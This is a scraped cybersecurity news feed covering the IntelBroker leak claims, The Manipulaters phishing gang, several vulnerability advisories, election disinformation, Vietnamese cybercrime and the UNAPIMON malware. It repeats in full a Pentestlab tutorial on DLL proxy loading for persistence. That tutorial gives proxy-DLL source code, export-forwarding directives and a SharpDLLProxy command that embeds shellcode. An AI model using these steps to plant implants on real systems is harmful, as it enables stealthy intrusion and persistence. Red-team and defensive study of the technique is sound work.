By Waqas
The leaked data was previously being sold by the IntelBroker hacker for just $3,000 in Monero (XMR) cryptocurrency.
This is a post from HackRead.com Read the original post: IntelBroker Leaks Alleged National Security Data Tied to US Contractor Acuity Inc.

IntelBroker hacker leaks data linked to US contractor Acuity Inc., exposing potentially sensitive intelligence agencies-related data – US government previously denied Acuity Inc. breach, but experts warn of national security risks.

The notorious IntelBroker hacker and their affiliates have leaked a trove of sensitive records, which they claim jeopardize the United States national security. The data, leaked on **Breach Forums**, is linked to US Federal contractor Acuity Inc., in a data breach allegedly carried out in March 2024. The data was previously being sold for just $3,000 in Monero (XMR) cryptocurrency.

As seen by Hackread.com, IntelBroker has classified the breach as a “National Security Documents Leak,” involving documents from the “Five Eyes Intelligence Group.” The leaked records now accessible to the public include highly sensitive information such as full names, email addresses, office numbers, personal cell numbers, email addresses (government, military, and Pentagon), classified information, and communications between the Five Eyes, 14 Eyes, and the US’s allies.

Screenshot from Breach Forums (Credit: Hackread.com)

For your information, The Five Eyes Intelligence Group is an intelligence alliance including five English-speaking countries: the United States, the United Kingdom, Canada, Australia, and New Zealand. The alliance aims to share intelligence and collaborate on signals intelligence (SIGINT) gathering, surveillance, and **cybersecurity activities**.

****Background of the alleged Acuity Inc. data breach****

On March 4, 2024, **Hackread.com published an exclusive report** on a data breach allegedly involving Acuity Inc., a federal contractor based in Reston, Virginia. The breach was claimed by IntelBroker.

The hacker claimed the use of a zero-day security vulnerability in GitHub to access Acuity Inc.’s tokens and facilitate their malicious activities, including the theft of data belonging to U.S. Citizenship and Immigration Services (USCIS) and U.S. Immigration and Customs Enforcement (ICE).

Hackread.com reported the breach to GitHub, Acuity Inc., ICE, and USCIS. However, none of the organizations responded to the report. In contrast, Homeland Security, responding to a third-party media site that had not reported on the incident or analyzed the data, denied IntelBroker’s claims and labelled the breach as false, categorizing the leaked information as “test demos for vendors” with fake names and contact information used solely to provide examples of received data.

****Now What?****

Despite the US Government’s version that the data leak is fake, Hackread.com’s analysis suggests that the publicly leaked information remains highly consequential. Even if the data is fabricated, it exposes the modus operandi of US intelligence agencies and their allies, potentially risking their operational security and strategies.

> I will say again: data like this can’t be faked unless it’s copy paste from different and previous leaks which is highly unlikely based on IntelBroker’s previous attacks.
> 
> Also, their availability on twitter should be good for OSINT researchers, no? https://t.co/6CkYBp07Ua
> 
> — Waqas (@WAK4S) April 3, 2024

****IntelBroker****

The hacker’s origins and affiliates are unknown; however, according to the United States government, IntelBroker is alleged to be the perpetrator behind one of the **T-Mobile data breaches**.

Additionally, IntelBroker is known for targeting high-profile targets in the United States. Some of their previous data breaches include **Las Angeles Intl. Airport**, **US DoD Documents**, **Staffing Giant Robert Half**, **Facebook Marketplace Database**, DARPA-related accesses in **General Electric breach**, **Weee! Grocer**y and several others.

1.  US Govt’s secret terrorist watchlist with 2M records exposed online
2.  Chinese Group Storm-0558 Hacked European Govt Emails, Microsoft
3.  Adobe ColdFusion Flaw Used by Hackers to Access US Govt Servers
4.  Traffic sign near ICE headquarters hacked with “Abolish ICE” message
5.  Norweigian researcher exposes how a US firm collected his location data

IntelBroker Leaks Alleged National Security Data Tied to US Contractor Acuity Inc.

Roughly nine years ago, KrebsOnSecurity profiled a Pakistan-based cybercrime group called "The Manipulaters," a sprawling web hosting network of phishing and spam delivery platforms. In January 2024, The Manipulaters pleaded with this author to unpublish previous stories about their work, claiming the group had turned over a new leaf and gone legitimate. But new research suggests that while they have improved the quality of their products and services, these nitwits still fail spectacularly at hiding their illegal activities.

Roughly nine years ago, KrebsOnSecurity profiled a Pakistan-based cybercrime group called “**The Manipulaters**,” a sprawling web hosting network of phishing and spam delivery platforms. In January 2024, The Manipulaters pleaded with this author to unpublish previous stories about their work, claiming the group had turned over a new leaf and gone legitimate. But new research suggests that while they have improved the quality of their products and services, these nitwits still fail spectacularly at hiding their illegal activities.

In May 2015, KrebsOnSecurity published a brief writeup about the brazen Manipulaters team, noting that they openly operated hundreds of web sites selling tools designed to trick people into giving up usernames and passwords, or deploying malicious software on their PCs.

Manipulaters advertisement for “Office 365 Private Page with Antibot” phishing kit sold on the domain heartsender,com. “Antibot” refers to functionality that attempts to evade automated detection techniques, keeping a phish deployed as long as possible. Image: DomainTools.

The core brand of The Manipulaters has long been a shared cybercriminal identity named “**Saim Raza**,” who for the past decade has peddled a popular spamming and phishing service variously called “**Fudtools**,” “**Fudpage**,” “**Fudsender**,” “**FudCo**,” etc. The term “FUD” in those names stands for “**F**ully **U**n-**D**etectable,” and it refers to cybercrime resources that will evade detection by security tools like antivirus software or anti-spam appliances.

A September 2021 story here checked in on The Manipulaters, and found that Saim Raza and company were prospering under their FudCo brands, which they secretly managed from a front company called **We Code Solutions**.

That piece worked backwards from all of the known Saim Raza email addresses to identify Facebook profiles for multiple We Code Solutions employees, many of whom could be seen celebrating company anniversaries gathered around a giant cake with the words “FudCo” painted in icing.

Since that story ran, KrebsOnSecurity has heard from this Saim Raza identity on two occasions. The first was in the weeks following the Sept. 2021 piece, when one of Saim Raza’s known email addresses — **bluebtcus@gmail.com** — pleaded to have the story taken down.

“Hello, we already leave that fud etc before year,” the Saim Raza identity wrote. “Why you post us? Why you destroy our lifes? We never harm anyone. Please remove it.”

Not wishing to be manipulated by a phishing gang, KrebsOnSecurity ignored those entreaties. But on Jan. 14, 2024, KrebsOnSecurity heard from the same bluebtcus@gmail.com address, apropos of nothing.

“Please remove this article,” Sam Raza wrote, linking to the 2021 profile. “Please already my police register case on me. I already leave everything.”

Asked to elaborate on the police investigation, Saim Raza said they were freshly released from jail.

“I was there many days,” the reply explained. “Now back after bail. Now I want to start my new work.”

Exactly what that “new work” might entail, Saim Raza wouldn’t say. But a new report from researchers at **DomainTools.com** finds that several computers associated with The Manipulaters have been massively hacked by malicious data- and password-snarfing malware for quite some time.

DomainTools says the malware infections on Manipulaters PCs exposed “vast swaths of account-related data along with an outline of the group’s membership, operations, and position in the broader underground economy.”

“Curiously, the large subset of identified Manipulaters customers appear to be compromised by the same stealer malware,” DomainTools wrote. “All observed customer malware infections began after the initial compromise of Manipulaters PCs, which raises a number of questions regarding the origin of those infections.”

A number of questions, indeed. The core Manipulaters product these days is a spam delivery service called **HeartSender**, whose homepage openly advertises phishing kits targeting users of various Internet companies, including **Microsoft 365**, **Yahoo**, **AOL**, **Intuit**, **iCloud** and **ID.me**, to name a few.

A screenshot of the homepage of HeartSender 4 displays an IP address tied to fudtoolshop@gmail.com. Image: DomainTools.

HeartSender customers can interact with the subscription service via the website, but the product appears to be far more effective and user-friendly if one downloads HeartSender as a Windows executable program. Whether that HeartSender program was somehow compromised and used to infect the service’s customers is unknown.

However, DomainTools also found the hosted version of HeartSender service leaks an extraordinary amount of user information that probably is not intended to be publicly accessible. Apparently, the HeartSender web interface has several webpages that are accessible to unauthenticated users, exposing customer credentials along with support requests to HeartSender developers.

“Ironically, the Manipulaters may create more short-term risk to their own customers than law enforcement,” DomainTools wrote. “The data table “User Feedbacks” (sic) exposes what appear to be customer authentication tokens, user identifiers, and even a customer support request that exposes root-level SMTP credentials–all visible by an unauthenticated user on a Manipulaters-controlled domain. Given the risk for abuse, this domain will not be published.”

This is hardly the first time The Manipulaters have shot themselves in the foot. In 2019, _The Manipulaters failed to renew their core domain name_ — manipulaters\[.\]com — the same one tied to so many of the company’s past and current business operations. That domain was quickly scooped up by Scylla Intel, a cyber intelligence firm that focuses on connecting cybercriminals to their real-life identities.

Currently, The Manipulaters seem focused on building out and supporting HeartSender, which specializes in spam and email-to-SMS spamming services.

“The Manipulaters’ newfound interest in email-to-SMS spam could be in response to the massive increase in smishing activity impersonating the USPS,” DomainTools wrote. “Proofs posted on HeartSender’s Telegram channel contain numerous references to postal service impersonation, including proving delivery of USPS-themed phishing lures and the sale of a USPS phishing kit.”

Reached via email, the Saim Raza identity declined to respond to questions about the DomainTools findings.

“First \[of\] all we never work on virus or compromised computer etc,” Raza replied. “If you want to write like that fake go ahead. Second I leave country already. If someone bind anything with exe file and spread on internet its not my fault.”

Asked why they left Pakistan, Saim Raza said the authorities there just wanted to shake them down.

“After your article our police put FIR on my \[identity\],” Saim Raza explained. “FIR” in this case stands for “First Information Report,” which is the initial complaint in the criminal justice system of Pakistan.

“They only get money from me nothing else,” Saim Raza continued. “Now some officers ask for money again again. Brother, there is no good law in Pakistan just they need money.”

Saim Raza has a history of being slippery with the truth, so who knows whether The Manipulaters and/or its leaders have in fact fled Pakistan (it may be more of an extended vacation abroad). With any luck, these guys will soon venture into a more Western-friendly, “good law” nation and receive a warm welcome by the local authorities.

‘The Manipulaters’ Improve Phishing, Still Fail at Opsec

Lack of sanitization during Installation Process in Dolibarr ERP CRM up to version 19.0.0 allows an attacker with adjacent access to the network to execute arbitrary code via a specifically crafted input.

**Dolibarr ERP CRM Code Injection vulnerability during installation**

Moderate severity GitHub Reviewed Published Apr 3, 2024 to the GitHub Advisory Database • Updated Apr 3, 2024

GHSA-p73x-rpgm-3v56: Dolibarr ERP CRM Code Injection vulnerability during installation

What cybersecurity professionals around the world can do to defend against the scourge of online disinformation in this year's election cycle.

Shamla Naidoo, Head of Cloud Strategy & Innovation, Netskope

April 3, 2024

5 Min Read

Source: Feng Yu via Alamy Stock Photo

COMMENTARY

In recent global election cycles, the Internet and social media have facilitated the widespread dissemination of false news, misleading memes, and deepfake content, overwhelming voters. Given that it is difficult to directly compromise election systems used to vote and count votes, adversaries turn to the age-old psychological manipulation technique to get the desired outcomes: no hacking needed. With the emergence of generative artificial intelligence (AI) tools, the impact of disinformation campaigns is expected to escalate further. This has led to increased uncertainty and ambiguity regarding reality, with personal biases often shaping perceptions of truth.

In a sense, disinformation is like a cyber threat: As security leaders, we realize that malware, phishing attempts, and other attacks are a given. But we put controls in place to minimize the impact, if not prevent it entirely. We develop defense strategies based on decades of historical knowledge and data to gain the best advantage.

Today's disinformation campaigns, however, are essentially a product of the last decade, and we have not yet designed a mature series of controls to counter it. But we need to. With 83 national elections in 78 countries taking place in 2024 — a volume not expected to be matched until 2048 — the stakes have never been higher. A recent wave of troubling incidents and developments illustrate the many ways that adversaries are attempting to deceive the hearts and minds of the world's voters:

*   In Europe, the French Foreign Minister accused Russia of setting up a network of more than 190 websites intended to spread disinformation to "destroy Europe's unity" and "make our democracies exhausted" in seeking to discourage support for Ukraine. The network, codenamed "Portal Kombat," has also sought to confuse voters, discredit certain candidates, and disrupt large sporting events like the Paris Olympics.
    
*   In Pakistan, voters have been exposed to false Covid-19 and anti-vaccination propaganda, online hate speech against religious groups, and attacks on women's movements.
    
*   The World Economic Forum ranks foreign and domestic entities' or individuals' use of misinformation and disinformation as the "most severe global risk" for the next two years — over extreme weather events, cyberattacks, armed conflicts, and economic downturns.
    

Let's be clear here about the difference between disinformation and misinformation: The latter is information that is wrong, but not intended for mass distribution. The "fake news" distributor may not even be aware of its inaccuracies.

Disinformation, on the other hand, occurs when an entity (such as an adversarial nation-state) knowingly leverages misinformation with the intent of viral distribution.

The psychological manipulation jeopardizes the stability of democratic institutions. Think of disinformation farms as a large office floor with hundreds or even thousands of people doing nothing but making up authentic-looking blogs, articles, and videos to target candidates and positions that contradict their agendas. Once unleashed on social media, these falsehoods spread rapidly, reaching millions and masquerading as real events.

How can citizens best protect themselves from these campaigns to maintain a firm grasp on what's real and what isn't? How can cybersecurity leaders help?

Here are four best practices.

**DYOV: Do Your Own Vetting**

A meme or GIF doesn't stand alone as a credible source of information. Not all professional-looking publications are credible or accurate. Not every statement from a trusted source may be their own. It’s too easy to create fake videos using AI-generated images. There are few arbiters of truth on the Internet, so buyer beware. Moreover, we can't depend on social media platforms to monitor and eliminate disinformation — regardless of whether we agree or embrace it. Section 230 has established immunity for online companies serving as publication resources for third-party content.

It's critical to look at different platforms and reconcile those with what government websites, real news outlets, and respected organizations such as the National Conference of State Legislatures (NCSL) are reporting. Inconsistencies should serve as a warning sign. Also, when seeking out biases from the information source, always ask, "Why should I believe this? Who is the author? What is their interest in this position?"

**2\. Avoid Becoming Part of the Problem**

Social media makes it too easy to run with a post or video that presents a version of "truth" that is anything but. Architects of disinformation campaigns depend upon individual users to spread their messages, i.e., "It came from my sibling/boss/neighbor, so it must be true." Again, DYOV before passing anything along. Be judicious about clicking on "forward" and "like" buttons to avoid being an engine of these campaigns.

**3\. Follow Watchdogs**

Organizations like the Netherlands-based Defend Democracy, the University of Pennsylvania-based FactCheck.org and Santa Monica, Calif.-based RAND Corp. offer resources to better help distinguish fact from fiction. In the academic community, San Diego State University's University Library and Stetson University's duPont-Ball Library maintain a list of watchdog groups, databases, and other resources.

**4\. Take a Leadership Stand**

As cybersecurity professionals, we recognize that threats like brand impersonation and phishing occur beyond our controlled technology environments. We cannot block every email, and our controls won't block or even detect impersonations on technology that we don't control. Instead, we must actively promote cyber education and awareness so employees can learn about the latest phishing attempts and the dangers of clicking on unfamiliar links.

We should take a similar, education-focused approach with disinformation campaigns. We can create employee awareness programs so they understand what to look for, even when the attempts do not involve our technology. We can even promote this knowledge through various platforms — internal company communications, public-facing blogs, articles — where we have a prominent voice. Offer credible and contextual resources against which they can vet information.

Unfortunately, disinformation — especially during political seasons — cannot be avoided, forcing us to field all relevant "facts" through appropriate vetting. However, tools enable everyone to do this while educating employees and the public as cybersecurity leaders. If they do so, 2024 may be remembered as the year when the global community decided that the truth matters.

**About the Author(s)**

Head of Cloud Strategy & Innovation, Netskope

Currently the head of cloud strategy & innovation at Netskope, Shamla Naidoo is a technology industry veteran with experience helping businesses across diverse sectors and cultures use technology more effectively. She has successfully embraced and led digital strategy in executive leadership roles such as Global CISO, CIO, VP, and Managing Partner, at companies like IBM, Anthem (Wellpoint), Marriott (Starwood), and Northern Trust.

Shamla has helped organizations in over 20 countries recognize the impact of digital transformation globally and advise their stakeholders on predicting and navigating the necessary changes in laws and regulations. In addition, she has worked with intelligence communities to use digital and cyber within their organizations to protect businesses and society from technology misuse.

Shamla remains actively engaged in the industry, with organizations like the Security Advisor Alliance, the Shared Security Assessments Group, Institute for Applied Network Security (IANS), Executive Women’s Forum (EWF), HMG Strategy Group, and the Round Table Network. In addition, she is an influential member of the legal community, creating and teaching courses on law, technology, and privacy for the University of Illinois Chicago School of Law. She frequently speaks at the American Bar Association and formerly served as the Committee Chair on Legal Technology for the Illinois State Bar Association. As a practitioner, teacher and coach, she enjoys the opportunity to help seasoned professionals to take their careers to the next level.

'Unfaking' News: How to Counter Disinformation Campaigns in Global Elections

DLL Proxy Loading is a technique which an arbitrary DLL exports the same functions as the legitimate DLL and forwards the calls to the legitimate… 
Continue reading → Persistence – DLL Proxy Loading

DLL Proxy Loading is a technique which an arbitrary DLL exports the same functions as the legitimate DLL and forwards the calls to the legitimate DLL in an attempt to not disrupt the execution flow so the binary is executed as normal. The technique falls under the category of DLL Hijacking and it is typically utilized as a stealthier method to load an arbitrary DLL without breaking the original operation of a process which might be an indicator of compromise for defenders.

When a process is initiated DLL’s are also loaded and make calls to exported functions as illustrated in the diagram below:

DLL Loading

The DLL Proxy Loading technique requires an arbitrary DLL that will be planted in the same directory and with the same name of the legitimate DLL and will proxy the same exports as the original DLL. However, the arbitrary DLL will also load the implant code and therefore code will executed under the context of a trusted process.

DLL Proxy Loading

The following DLL code exports the following functions:

1.  exportedFunction1
2.  exportedFunction2
3.  exportedFunction3

#include "pch.h"

BOOL APIENTRY DllMain( HMODULE hModule,
                       DWORD  ul\_reason\_for\_call,
                       LPVOID lpReserved
                     )
{
    switch (ul\_reason\_for\_call)
    {
    case DLL\_PROCESS\_ATTACH:
    case DLL\_THREAD\_ATTACH:
    case DLL\_THREAD\_DETACH:
    case DLL\_PROCESS\_DETACH:
        break;
    }
    return TRUE;
}

extern "C" \_\_declspec(dllexport) VOID exportedFunction1(int a)
{
    MessageBoxA(NULL, "Pentestlab exportedFunction1", "Pentestlab exportedFunction1", 0);
}

extern "C" \_\_declspec(dllexport) VOID exportedFunction2(int a)
{
    MessageBoxA(NULL, "Pentestlab exportedFunction2", "Pentestlab exportedFunction2", 0);
}

extern "C" \_\_declspec(dllexport) VOID exportedFunction3(int a)
{
    MessageBoxA(NULL, "Pentestlab exportedFunction3", "Pentestlab exportedFunction3", 0);
}

Trusted DLL

Executing the DLL will verify that the code is running as normal.

    rundll32 DLL-Proxying.dll,exportedFunction1

DLL Proxy Loading – Message Box

From the offensive perspective prior to developing an arbitrary DLL, the exported functions of the legitimate DLL needs to be identified. This is feasible with the DLL export viewer.

DLL Export Viewer

Alternatively, Visual Studio contains a binary which can used to retrieve the exported functions.

    dumpbin.exe /exports C:\temp\DLL-Proxying.dll

DLL Export – Dumpbin

On the proxy DLL a comment directive in the source code will match the exported functions of the legitimate DLL.

#include "pch.h"

#pragma comment(linker, "/export:exportedFunction1=trusted1.exportedFunction1")
#pragma comment(linker, "/export:exportedFunction2=trusted1.exportedFunction2")
#pragma comment(linker, "/export:exportedFunction3=trusted1.exportedFunction3")

BOOL APIENTRY DllMain(HMODULE hModule,
    DWORD  ul\_reason\_for\_call,
    LPVOID lpReserved
)
{

    switch (ul\_reason\_for\_call)
    {
    case DLL\_PROCESS\_ATTACH:
    {
        MessageBoxA(NULL, "DLL Proxy Loading", "DLL Proxy Loading", 0);
    }
    case DLL\_THREAD\_ATTACH:
    case DLL\_THREAD\_DETACH:
    case DLL\_PROCESS\_DETACH:
        break;
    }
    return TRUE;
}

DLL Proxy

Similarly, using the _dumpbin_ binary will verify the exported functions.

    dumpbin.exe /exports C:\Users\panag\source\repos\Pentestlab\DLL-Proxying\x64\Release\DLL-Proxying.dll

DLL Export Function – Dumpbin

Execution of the DLL will verify the exported functions are linked to the trusted DLL.

    rundll32.exe DLL-Proxying.dll,pentestlab

DLL Proxy Loading – MessageBox

Accenture has developed a tool call _Spartacus_ which can be used to identify DLL Proxy opportunities.

    Spartacus.exe --mode detect

Spartacus – DLL Proxy Detection

In conjunction with Process Monitor it is also feasible to identify DLL Hijacking opportunities and export the output to a CSV file.

    Spartacus.exe --mode dll --procmon Procmon64.exe --pml test.plm --csv ./output.csv --exports . --verbose

Spartacus – DLL Hijacking

Melvin Langvik developed a tool called SharpDLLProxy which retrieves exported functions from a legitimate DLL and generates a proxy DLL template that can be used for DLL Side Loading.

    SharpDLLProxy.exe --dll libnettle-8.dll --payload shellcode.bin

SharpDLLProxy

The tool will automatically grab the exported functions and will generate the DLL code. It should be noted that the shellcode should be dropped on disk in the form of a binary file (.bin).

SharpProxyDLL – DLL Proxy Code

Once the associated process is executed the proxy DLL will load the arbitrary code and will forward to the legitimate DLL the exported functions in order to enable the application to run as normal. It should be noted that the legitimate DLL should be renamed and the proxy DLL should contain the same name as the legitimate DLL file.

fzsftp

A command and control session will established every time the associated process is executed on the system. From the perspective of persistence it is essential to choose a common Windows process.

DLL Proxy Loading – C2

DLL Proxy Loading – Implant

The proxy DLL will run in the memory space of the process.

DLL Proxy Loading – Thread

**References**

*   https://www.ired.team/offensive-security/persistence/dll-proxying-for-persistence
*   https://github.com/tothi/dll-hijack-by-proxying
*   https://github.com/Flangvik/SharpDllProxy
*   https://www.cobaltstrike.com/blog/create-a-proxy-dll-with-artifact-kit
*   https://redteaming.co.uk/2020/07/12/dll-proxy-loading-your-favorite-c-implant/

**Post navigation**

Persistence – DLL Proxy Loading

DLL Proxy Loading is a technique which an arbitrary DLL exports the same functions as the legitimate DLL and forwards the calls to the legitimate DLL in an attempt to not disrupt the execution flow so the binary is executed as normal. The technique falls under the category of DLL Hijacking and it is typically utilized as a stealthier method to load an arbitrary DLL without breaking the original operation of a process which might be an indicator of compromise for defenders.

When a process is initiated DLL’s are also loaded and make calls to exported functions as illustrated in the diagram below:

DLL Loading

The DLL Proxy Loading technique requires an arbitrary DLL that will be planted in the same directory and with the same name of the legitimate DLL and will proxy the same exports as the original DLL. However, the arbitrary DLL will also load the implant code and therefore code will executed under the context of a trusted process.

DLL Proxy Loading

The following DLL code exports the following functions:

1.  exportedFunction1
2.  exportedFunction2
3.  exportedFunction3

#include "pch.h"

BOOL APIENTRY DllMain( HMODULE hModule,
                       DWORD  ul\_reason\_for\_call,
                       LPVOID lpReserved
                     )
{
    switch (ul\_reason\_for\_call)
    {
    case DLL\_PROCESS\_ATTACH:
    case DLL\_THREAD\_ATTACH:
    case DLL\_THREAD\_DETACH:
    case DLL\_PROCESS\_DETACH:
        break;
    }
    return TRUE;
}

extern "C" \_\_declspec(dllexport) VOID exportedFunction1(int a)
{
    MessageBoxA(NULL, "Pentestlab exportedFunction1", "Pentestlab exportedFunction1", 0);
}

extern "C" \_\_declspec(dllexport) VOID exportedFunction2(int a)
{
    MessageBoxA(NULL, "Pentestlab exportedFunction2", "Pentestlab exportedFunction2", 0);
}

extern "C" \_\_declspec(dllexport) VOID exportedFunction3(int a)
{
    MessageBoxA(NULL, "Pentestlab exportedFunction3", "Pentestlab exportedFunction3", 0);
}

Trusted DLL

Executing the DLL will verify that the code is running as normal.

    rundll32 DLL-Proxying.dll,exportedFunction1

DLL Proxy Loading – Message Box

From the offensive perspective prior to developing an arbitrary DLL, the exported functions of the legitimate DLL needs to be identified. This is feasible with the DLL export viewer.

DLL Export Viewer

Alternatively, Visual Studio contains a binary which can used to retrieve the exported functions.

    dumpbin.exe /exports C:\temp\DLL-Proxying.dll

DLL Export – Dumpbin

On the proxy DLL a comment directive in the source code will match the exported functions of the legitimate DLL.

#include "pch.h"

#pragma comment(linker, "/export:exportedFunction1=trusted1.exportedFunction1")
#pragma comment(linker, "/export:exportedFunction2=trusted1.exportedFunction2")
#pragma comment(linker, "/export:exportedFunction3=trusted1.exportedFunction3")

BOOL APIENTRY DllMain(HMODULE hModule,
    DWORD  ul\_reason\_for\_call,
    LPVOID lpReserved
)
{

    switch (ul\_reason\_for\_call)
    {
    case DLL\_PROCESS\_ATTACH:
    {
        MessageBoxA(NULL, "DLL Proxy Loading", "DLL Proxy Loading", 0);
    }
    case DLL\_THREAD\_ATTACH:
    case DLL\_THREAD\_DETACH:
    case DLL\_PROCESS\_DETACH:
        break;
    }
    return TRUE;
}

DLL Proxy

Similarly, using the _dumpbin_ binary will verify the exported functions.

    dumpbin.exe /exports C:\Users\panag\source\repos\Pentestlab\DLL-Proxying\x64\Release\DLL-Proxying.dll

DLL Export Function – Dumpbin

Execution of the DLL will verify the exported functions are linked to the trusted DLL.

    rundll32.exe DLL-Proxying.dll,pentestlab

DLL Proxy Loading – MessageBox

Accenture has developed a tool call _Spartacus_ which can be used to identify DLL Proxy opportunities.

    Spartacus.exe --mode detect

Spartacus – DLL Proxy Detection

In conjunction with Process Monitor it is also feasible to identify DLL Hijacking opportunities and export the output to a CSV file.

    Spartacus.exe --mode dll --procmon Procmon64.exe --pml test.plm --csv ./output.csv --exports . --verbose

Spartacus – DLL Hijacking

Melvin Langvik developed a tool called SharpDLLProxy which retrieves exported functions from a legitimate DLL and generates a proxy DLL template that can be used for DLL Side Loading.

    SharpDLLProxy.exe --dll libnettle-8.dll --payload shellcode.bin

SharpDLLProxy

The tool will automatically grab the exported functions and will generate the DLL code. It should be noted that the shellcode should be dropped on disk in the form of a binary file (.bin).

SharpProxyDLL – DLL Proxy Code

Once the associated process is executed the proxy DLL will load the arbitrary code and will forward to the legitimate DLL the exported functions in order to enable the application to run as normal. It should be noted that the legitimate DLL should be renamed and the proxy DLL should contain the same name as the legitimate DLL file.

fzsftp

A command and control session will established every time the associated process is executed on the system. From the perspective of persistence it is essential to choose a common Windows process.

DLL Proxy Loading – C2

DLL Proxy Loading – Implant

The proxy DLL will run in the memory space of the process.

DLL Proxy Loading – Thread

**References**

*   https://www.ired.team/offensive-security/persistence/dll-proxying-for-persistence
*   https://github.com/tothi/dll-hijack-by-proxying
*   https://github.com/Flangvik/SharpDllProxy
*   https://www.cobaltstrike.com/blog/create-a-proxy-dll-with-artifact-kit
*   https://redteaming.co.uk/2020/07/12/dll-proxy-loading-your-favorite-c-implant/

**Rate this:**

**Post navigation**

Server Side Request Forgery (SSRF) vulnerability in Gleez Cms 1.2.0, allows remote attackers to execute arbitrary code and obtain sensitive information via modules/gleez/classes/request.php.

**Gleez Cms Server Side Request Forgery (SSRF) vulnerability**

Critical severity GitHub Reviewed Published Apr 3, 2024 to the GitHub Advisory Database • Updated Apr 3, 2024

GHSA-7mxg-r76p-363g: Gleez Cms Server Side Request Forgery (SSRF) vulnerability

In _imagingcms.c in Pillow before 10.3.0, a buffer overflow exists because strcpy is used instead of strncpy.

**Pillow buffer overflow vulnerability**

Moderate severity GitHub Reviewed Published Apr 3, 2024 to the GitHub Advisory Database • Updated Apr 3, 2024

GHSA-44wm-f244-xhp3: Pillow buffer overflow vulnerability

An economic success story in Asia, Vietnam is seeing more manufacturing and more business investment. But with that comes a significant uptick in cybercrime as well.

Source: Jose Vilchez via Alamy Stock Photo

For one week last month, Vietnamese brokerage VNDirect Cyber Systems shut down its securities trading systems and disconnected from the country's two stock exchanges after a ransomware attack encrypted critical data. VNDirect was offline recovering until eight days later when the Ho Chi Minh and Hanoi stock exchanges allowed it to restart trading on April 1.

VNDirect Cyber Systems is just the latest Vietnamese company whose operations have been severely disrupted by a cyberattack.

In 2023, nearly 14,000 organizations across Vietnam suffered a cyberattack, an increase of 10% from the prior year, according to the country's National Cyber Security Centre (NCSC). While estimated damages caused by malicious software declined for the second year in a row to 17.3 trillion VND, or about US $690 million, a variety of other cybersecurity metrics continue to worsen, according to regional experts.

Overall, the country's economic picture is in flux. And that has led to a rise in cybercrime, says Ngoc Bui, a cybersecurity expert at Menlo Security, a provider of secure enterprise browser technology.

"Economic conditions, particularly in regions with limited job opportunities and low wages for high-skilled roles, can drive individuals to turn to cybercrime," he says. "This trend, fueled by the allure of cybercrime's rewards and digital anonymity, emphasizes the need for creating legitimate tech sector jobs to stimulate economic growth and counter cybercrime."

Vietnam is one of the fastest-growing economies in Asia, making the most of its connections to both China and the United States. The country's digital economy is expected to top US $43 billion by 2025, in part because of its focus on technology including initiatives in e-government, smart cities, and artificial intelligence, according to consulting giant PricewaterhouseCoopers. As a result, in mid-March, a delegation of nearly 60 US companies — including giants such as Meta and Boeing — visited the country to seek out investment opportunities.

**Cracked Software, Junk Bank Accounts**

The success has brought rapid technology adoption and significant cybercrime.

Nearly 750,000 systems were attacked by credential-stealing malware in 2023, an increase of 40% compared to the previous year, according to regional cybersecurity firm Bkav Technology Group. Online financial fraud has taken off due to a problem specific to the country: Bank account owners selling access to unused accounts. These so-called "junk accounts" make it difficult to track cybercriminals by following the money, says Nguyen Van Cuong, director in charge of cybersecurity at Bkav.

"Many people simply think that selling accounts they don't use won't be a problem," he said in a statement. "But in reality, bad guys have taken advantage of these bank accounts to carry out illegal transactions, hiding their origin, causing difficulties for investigation agencies."

Pirated or cracked software is another major issue. Fifty-three percent of computers are thought to be using pirated software, according to Bkav.

While the government has issued decrees to increase cybersecurity awareness, citizens continue to participate in these risky digital behavior, such as junk bank accounts and the use of cracked software, says Sarah Jones, a cyber threat intelligence research analyst at Critical Start.

"Vietnam's rapid digital growth creates a larger target for cybercriminals, and a lack of cybersecurity awareness among users makes them more susceptible," she says. "The widespread use of cracked software further exposes individuals and organizations to malware and exploitable weaknesses."

**Countering Cybercrime**

Vietnam's ruling Communist Party has strived to keep pace with cybercrime, issuing a number of directives to strengthen laws around the prevention and investigation of cybercrimes in 2021, and in 2020 launched efforts to raise public awareness of cybersecurity. Another directive, passed in 2019, required public sector organizations to spend at least 10% of their IT budget on cybersecurity. The sustained efforts has boosted Vietnam's ranking in the Global Cybersecurity Index to 25th out of 194 countries in the 2020 report (the latest available), up from 100th in 2017.

The country is already working with the United Nations Office on Drugs and Crime (UNODC) to strengthen the technical skills of law enforcement to tackle money laundering and other crimes.

Yet, divisions within the country are also driving the creation of dark platforms to escape increasing surveillance and Internet censorship by the government. A military group consisting of thousands of service members, known as Force 47, monitors communications and manages censorship in accordance with the government mandates, but also has resulted in the creation of several anonymity-as-a-service groups.

Such efforts will likely result in stronger Dark markets and platforms such as VietCredCare and DarkGate, both created by home-grown APT groups like Ocean Lotus and Lotus Bane, says Ken Dunham, cyber threat director at Qualys's threat research group.

"The threatscape in Vietnam is complicated with APT groups targeting companies for the benefit of the country, \[as well as\] Internet censorship, monitoring, and blocking of content by the Force 47 group," he says.

The next two years will be uncertain for Vietnam in many ways.

The leadership of the Community Party is expected to change by 2026, and economists wonder if the country can continue to deliver strong economic gains. Both uncertainties could breed more cybercrime in the future there.

**About the Author(s)**

Veteran technology journalist of more than 20 years. Former research engineer. Written for more than two dozen publications, including CNET News.com, Dark Reading, MIT's Technology Review, Popular Science, and Wired News. Five awards for journalism, including Best Deadline Journalism (Online) in 2003 for coverage of the Blaster worm. Crunches numbers on various trends using Python and R. Recent reports include analyses of the shortage in cybersecurity workers and annual vulnerability trends.

Ransomware, Junk Bank Accounts: Cyber Threats Proliferate in Vietnam

UNAPIMON works by meticulously disabling hooks in Windows APIs for detecting malicious processes.

Source: Panchenko Vladimir via Shutterstock

Researchers have spotted Earth Freybug, a China-linked threat actor, using a new malware tool to bypass mechanisms organizations might have put in place to monitor Windows application programming interfaces (APIs) for malicious activity.

The malware, which researchers at Trend Micro discovered and named UNAPIMON, works by disabling hooks in Windows APIs for inspecting and analyzing API-related processes for security issues.

**Unhooking APIs**

The goal is to prevent any processes that the malware spawns from being detected or inspected by antivirus tools, sandboxing products, and other threat detection mechanisms.

"Looking at the behavior of UNAPIMON and how it was used in the attack, we can infer that its primary purpose is to unhook critical API functions in any child process," Trend Micro said in a report this week.

"For environments that implement API monitoring through hooking, such as sandboxing systems, UNAPIMON will prevent child processes from being monitored," the security vendor said. This allows malicious programs to run without being detected.

